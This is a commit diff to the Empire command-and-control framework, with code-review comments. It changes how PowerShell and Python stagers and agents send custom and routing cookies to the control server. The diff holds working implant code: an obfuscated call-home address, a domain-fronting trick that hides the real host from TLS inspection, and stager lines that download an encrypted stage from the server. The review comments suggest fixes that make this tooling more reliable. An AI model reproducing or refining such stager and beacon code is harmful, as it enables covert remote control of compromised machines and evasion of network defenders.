Fix for 1142 complete
parent
516a7d8c1b
commit
f9018fc637
|
@ -140,7 +140,6 @@ function Invoke-Empire {
|
|||
# keep track of all background jobs
|
||||
# format: {'RandomJobName' : @{'Alias'=$RandName; 'AppDomain'=$AppDomain; 'PSHost'=$PSHost; 'Job'=$Job; 'Buffer'=$Buffer}, ... }
|
||||
$Script:Jobs = @{}
|
||||
$Script:Downloads = @{}
|
||||
# the currently imported script held in memory
|
||||
$script:ImportedScript = ''
|
||||
|
||||
|
|
|
@ -111,14 +111,17 @@ function Start-Negotiate {
|
|||
if ($customHeaders -ne "") {
|
||||
$headers = $customHeaders -split ',';
|
||||
$headers | ForEach-Object {
|
||||
$headerKey = $_.split(':')[0];
|
||||
$headerValue = $_.split(':')[1];
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{}};
|
||||
$headerKey = $($_ -split ':')[0];
|
||||
$headerValue = $($_ -split ':')[1];
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{};
|
||||
}
|
||||
|
||||
$wc.Headers.Add($headerKey, $headerValue);
|
||||
}
|
||||
|
||||
}
|
||||
$wc.Headers.Add("User-Agent",$UA);
|
||||
|
||||
|
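Review bot: `$($_ -split ':')[1]` on the new side keeps only the text between the first and second colon, so a custom header whose value itself contains a colon is silently truncated, and an entry without any colon leaves `$headerValue` empty and still adds the header; limiting the split to two pieces fixes both cases on the PowerShell side, `$headerKey,$headerValue = $_ -split ':',2;`, here and in the @ -214 hunk. The listener-side Python hunks at @ -461 and @ -722 have the same shape with `header.split(':')[1]`, where `headerKey, headerValue = header.split(':', 1)` keeps the whole value (an entry with no colon then needs an explicit guard rather than an IndexError/ValueError). The rebuilt `if ($headerKey -eq "host"){ ... }` block does repair the brace mismatch the old lines had. Start-Negotiate's body continues outside the hunk on both sides.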
@ -214,10 +217,12 @@ function Start-Negotiate {
|
|||
$headers | ForEach-Object {
|
||||
$headerKey = $_.split(':')[0];
|
||||
$headerValue = $_.split(':')[1];
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{}};
|
||||
#If host header defined, assume domain fronting is in use and add a call to the base URL first
|
||||
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
|
||||
if ($headerKey -eq "host"){
|
||||
try{$ig=$WC.DownloadData($s)}catch{};
|
||||
}
|
||||
|
||||
$wc.Headers.Add($headerKey, $headerValue);
|
||||
}
|
||||
}
|
||||
|
|
|
@ -286,7 +286,7 @@ class Listener:
|
|||
|
||||
if language.startswith('po'):
|
||||
# PowerShell
|
||||
|
||||
|
||||
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
|
||||
if safeChecks.lower() == 'true':
|
||||
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||
|
@ -334,13 +334,9 @@ class Listener:
|
|||
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
|
||||
|
||||
if userAgent.lower() != 'none':
|
||||
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
|
||||
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
|
||||
stager += "'User-Agent',$u);"
|
||||
|
||||
if userAgent.lower() != 'none':
|
||||
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
|
||||
stager += "'User-Agent',$u);"
|
||||
|
||||
if proxy.lower() != 'none':
|
||||
if proxy.lower() == 'default':
|
||||
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
|
||||
|
@ -393,6 +389,7 @@ class Listener:
|
|||
b64RoutingPacket = base64.b64encode(routingPacket)
|
||||
|
||||
stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
|
||||
cookieString = "{}={};".format(cookie, b64RoutingPacket)
|
||||
|
||||
#Add custom headers if any
|
||||
if customHeaders != []:
|
||||
|
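Review bot: `cookieString = "{}={};".format(cookie, b64RoutingPacket)` seeds the merged cookie value with a fragment that already ends in `;`, and the @ -404 hunk appends `"{};".format(headerValue)` in the same way, so the generated `Cookie` header always ends with a dangling semicolon and separates pairs with `;` instead of the `; ` RFC 6265 specifies; most servers tolerate it, but collecting the pairs in a list is both cleaner and conformant: `cookieParts = ["{}={}".format(cookie, b64RoutingPacket)]` here, `cookieParts.append(headerValue.strip())` in the loop, and `stager += "\"Cookie\",\"%s\");" % ("; ".join(cookieParts))` where the header is emitted. The `.strip()` only matters if a profile entry is written with a space after the colon, which I cannot confirm from the hunks. The same concatenation appears in the @ -461 launcher hunk, the @ -722 agent-generation hunk and the PowerShell `"$RoutingCookie;$($script:Headers['Cookie']);"` in @ -743. The enclosing method's header is outside this hunk.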
@ -404,12 +401,16 @@ class Listener:
|
|||
if headerKey.lower() == "host":
|
||||
stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};")
|
||||
|
||||
if headerKey.lower() == "cookie":
|
||||
cookieString += "{};".format(headerValue)
|
||||
continue
|
||||
|
||||
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
|
||||
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
|
||||
|
||||
# add the RC4 packet to a cookie
|
||||
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
|
||||
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket)
|
||||
stager += "\"Cookie\",\"%s\");" % (cookieString)
|
||||
|
||||
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);")
|
||||
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
|
||||
|
@ -461,15 +462,23 @@ class Listener:
|
|||
launcherBase += "req=urllib2.Request(server+t);\n"
|
||||
# add the RC4 packet to a cookie
|
||||
launcherBase += "req.add_header('User-Agent',UA);\n"
|
||||
launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket)
|
||||
cookieString = "{}={};".format(cookie,b64RoutingPacket)
|
||||
|
||||
|
||||
# Add custom headers if any
|
||||
if customHeaders != []:
|
||||
for header in customHeaders:
|
||||
headerKey = header.split(':')[0]
|
||||
headerValue = header.split(':')[1]
|
||||
|
||||
if headerKey.lower() == "cookie":
|
||||
cookieString += "{};".format(headerValue)
|
||||
continue
|
||||
|
||||
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
|
||||
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
|
||||
|
||||
launcherBase += "req.add_header('Cookie',\"%s\");\n" % (cookieString)
|
||||
|
||||
|
||||
if proxy.lower() != "none":
|
||||
|
@ -722,6 +731,20 @@ class Listener:
|
|||
This is so agents can easily be dynamically updated for the new listener.
|
||||
"""
|
||||
|
||||
profile = listenerOptions['DefaultProfile']['Value']
|
||||
customHeaders = profile.split('|')[2:]
|
||||
cookieString = ""
|
||||
|
||||
if customHeaders != []:
|
||||
for header in customHeaders:
|
||||
headerKey = header.split(':')[0]
|
||||
headerValue = header.split(':')[1]
|
||||
|
||||
if headerKey.lower() == "cookie":
|
||||
cookieString += "{};".format(headerValue)
|
||||
|
||||
|
||||
|
||||
if language:
|
||||
if language.lower() == 'powershell':
|
||||
|
||||
|
@ -743,6 +766,13 @@ class Listener:
|
|||
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
|
||||
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
|
||||
|
||||
#if there is an additional custom cookie value, add it to the webclient object.
|
||||
if($script:Headers['Cookie'] -ne $null) {
|
||||
$cookieValueString = "$RoutingCookie;$($script:Headers['Cookie']);"
|
||||
}
|
||||
else {
|
||||
$cookieValueString = $RoutingCookie
|
||||
}
|
||||
# build the web request object
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
|
||||
|
||||
|
@ -755,8 +785,9 @@ class Listener:
|
|||
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent)
|
||||
$script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + cookie + """=$RoutingCookie")
|
||||
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Cookie",\"""" + cookie + """=$cookieValueString")
|
||||
|
||||
|
||||
# choose a random valid URI for checkin
|
||||
$taskURI = $script:TaskURIs | Get-Random
|
||||
$result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
|
||||
|
@ -797,7 +828,6 @@ class Listener:
|
|||
|
||||
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
|
||||
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
|
||||
|
||||
try {
|
||||
# get a random posting URI
|
||||
$taskURI = $Script:TaskURIs | Get-Random
|
||||
|
@ -814,7 +844,7 @@ class Listener:
|
|||
}
|
||||
}
|
||||
"""
|
||||
|
||||
|
||||
return updateServers + getTask + sendMessage
|
||||
|
||||
elif language.lower() == 'python':
|
||||
|
@ -847,7 +877,7 @@ def send_message(packets=None):
|
|||
# meta TASKING_REQUEST = 4
|
||||
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
|
||||
b64routingPacket = base64.b64encode(routingPacket)
|
||||
headers['Cookie'] = \"""" + cookie + """=%s" % (b64routingPacket)
|
||||
headers['Cookie'] = \"""" + cookie + """=%s;{}" % (b64routingPacket)
|
||||
|
||||
taskURI = random.sample(taskURIs, 1)[0]
|
||||
requestUri = server + taskURI
|
||||
|
@ -861,7 +891,7 @@ def send_message(packets=None):
|
|||
missedCheckins = missedCheckins + 1
|
||||
#if signaled for restaging, exit.
|
||||
if HTTPError.code == 401:
|
||||
sys.exit(0)
|
||||
pass
|
||||
|
||||
return (HTTPError.code, '')
|
||||
|
||||
|
@ -871,7 +901,7 @@ def send_message(packets=None):
|
|||
return (URLerror.reason, '')
|
||||
|
||||
return ('', '')
|
||||
"""
|
||||
""".format(cookieString)
|
||||
return updateServers + sendMessage
|
||||
|
||||
else:
|
||||
|
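Review bot: Switching the closing `"""` to `""".format(cookieString)` applies str.format to the entire sendMessage source template, so every other `{` or `}` in that template (a dict literal, a set, any `.format` call in the generated agent code) must now be doubled or the listener raises KeyError/IndexError when it builds the agent; the template begins outside this hunk, so I cannot confirm it is brace-free. A narrower substitution avoids the hazard: keep the template as a plain literal and splice the value only into the one affected line from the @ -847 hunk, `headers['Cookie'] = \"""" + cookie + """=%s;""" + cookieString + """" % (b64routingPacket)`, or use a unique marker with `.replace("__COOKIE__", cookieString)`. Separately, because the spliced text lands inside a `%`-formatted literal that is evaluated when the agent runs, a `%` in a custom cookie value would raise there; escaping it with `cookieString.replace('%', '%%')` before substitution closes that gap.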
|